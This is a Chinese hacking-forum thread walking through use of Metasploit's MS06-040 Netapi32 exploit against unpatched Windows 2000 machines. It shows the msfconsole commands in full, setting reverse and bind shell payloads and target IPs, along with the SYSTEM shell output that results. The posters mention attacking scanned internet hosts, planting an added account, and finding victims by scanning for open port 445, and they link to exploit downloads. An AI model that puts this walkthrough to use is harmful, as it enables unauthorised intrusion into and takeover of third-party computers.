动画作者:stuhack
原始连接:http://bbs.stuhack.com

MS06040漏洞利用动画
攻击目标:
192.1.80.2 (内网虚拟机)
所用工具:
MS06-040 Netapi32 Scanner http://vip.stuhack.com/soft/MS06-040Scanner.rar
Metasploit V2.6 http://vip.stuhack.com/soft/ActivePerl.msi
Perl解释器 : http://vip.stuhack.com/soft/framework.exe

下载下来先升级,运行安装目录下的 msfupdate.bat 文件
运行 msfconsole.bat , 这是控制台程序,升级.这里我已经升级完毕.
运行msfconsole.bat
           __.                .__.      .__. __.
  _____  _____/  |______   ____________ |  |  ____ |__|/  |_
/    \_/ __ \  __\__  \  /  ___/\____ \|  |  /  _ \|  \  __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|  __/|____/\____/|__||__|
    \/    \/       \/    \/ |__|
+ -- --=[ msfconsole v2.6 [153 exploits - 76 payloads]
msf > show exploits // //显示溢出利用程序,里面有153个溢出程序
msf > use netapi_ms06_040 //使用netapi_ms06_040 利用程序
msf netapi_ms06_040 > show payloads //显示可用的shellcode例表
msf netapi_ms06_040 > set PAYLOAD win32_reverse // //设置 PAYLOAD 为 win32_reverse
PAYLOAD -> win32_reverse
msf netapi_ms06_040(win32_reverse) > set RHOST 192.1.80.2 //设置被攻击的主机的IP
RHOST -> 192.1.80.2
msf netapi_ms06_040(win32_reverse) > set LHOST 192.1.80.152 // //设置本机的IP
LHOST -> 192.1.80.152
msf netapi_ms06_040(win32_reverse) > set TARGET 0
TARGET -> 0
msf netapi_ms06_040(win32_reverse) > set
LHOST: 192.1.80.152
PAYLOAD: win32_reverse
RHOST: 192.1.80.2
TARGET: 0
msf netapi_ms06_040(win32_reverse) > exploit 开始溢出
# Starting Reverse Handler.
# Detected a Windows 2000 target
# Sending request...
# Got connection from 192.1.80.152:4321 <-> 192.1.80.2:1039

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

这东西俺用mika MM的那个程序也做了一个简单的动画

http://forum.eviloctal.com/read-htm-tid-24215-page-2-fpage-1.html
在这里.

MS06-040漏洞演示动画


1:首先安装Metasploit Framework,建议安装2.6版!

2:把从网上下载的PM格式或者把发布的exploit代码保存为PM格式放到C:\Program Files\Metasploit Framework\home\framework\exploits目录下.
我已经把exploit放到目录下了，所以不重复了

3:你可以在"MSFConsole"界面下使用这个exploit或者运行"MSFWeb"后直接打开http://127.0.0.1:55555后使用这个exploit.

4:MSFConsole下的使用方法比较麻烦,推荐在WEB模式下使用!

5:演示一下在MSFConsole的使用方法.
info exploit netapi_ms06_040是查看这个exploit的相关信息
use netapi_ms06_040是使用这个exploit
show targets是查看Target模式,选择默认的就可以了
set PAYLOAD win32_bind是使用bind的方式获得SHELL,关于更多命令及使用方法,请大家自己去百度一下
show options是查看使用这个exploit及PAYLOAD后需要设置的一些参数
set RHOST xxx.xxx.xxx.xxx这个是设置你的攻击目标  用我之前扫出来的几个IP试试！
SMBDOM,SMBUSER,SMBPASS可以不用设置  并不是像网上传的那样，要密码和账号才能成功！
关于PAYLOAD的参数,都可以使用默认的
用set命令查看我们设置好的参数
最后使用exploit命令攻击目标

成功后会直接获得一个系统权限shell!

现在已经成功!这是我之前添加的账号!

6:演示一下在WEB界面下如何使用Metasploit Framework来攻击目标.
首先运行"MSFWeb"快捷方式,提示显示完后用浏览器打开http://127.0.0.1:55555/
找到MS06_040的exploit,选择他后,再选择一个Target模式,选择0就可以了
然后选择PAYLOAD,还是选win32_bind,win32_reverse是反弹一个SHELL回来,但是我测试这种模式的时候把目标主机搞死机了,所以没用这个PAYLOAD,大家可以试试,也许那是特殊现象.
选择好后,直接在RHOST里填入攻击目标的IP
点击Exploit就开始攻击了!

单击session x 后会在新页面打开一个网页式的SHELL,同样是系统权限



演示完了,关于如何寻找存在漏洞的主机这就要靠大家自己去发挥了,可以先扫描开了445端口的,然后用getos.exe筛选出WIN2000的主机,这个exploit成功的前提就是445端口开放+Win2000 or WinXP sp1+未打补丁的.


欢迎大家光临ExpCode.com这里会每天发布最新的exploits,保证比milw0rm速度快,数量多,呵呵!

Metasploit Framework下载地址:
http://www.expcode.com/download/framework-2.6.exe

MS06-040 Exploit:
/remote/2006/0815/1742.html

****************
ExpCode.com Over
****************

下载地址为：
http://www.expcode.com/download/ms06040demo.zip
解压密码：ExpCode.com

这个好像是最早的040溢出动画演示了，拿的是外网做的例子，楼主利用的工具溢出外网貌似成功率不高，还不如用mika修改版版的EXP，fhod兄好像也是拿的内网做的实验。

引用:

这里是引用第[1 楼]的fhod于2006-08-20 12:18发表的：
这东西俺用mika MM的那个程序也做了一个简单的动画

http://forum.eviloctal.com/read-htm-tid-24215-page-2-fpage-1.html
在这里.

fhod，把你那个动画独立单发出来吧。：：））在那么多帖子中挺难找的。

楼上的建议不错哈
俺这就发出来
俺用mika的那个在外网中也溢出成功一个
对2000的系统成功率很高的说.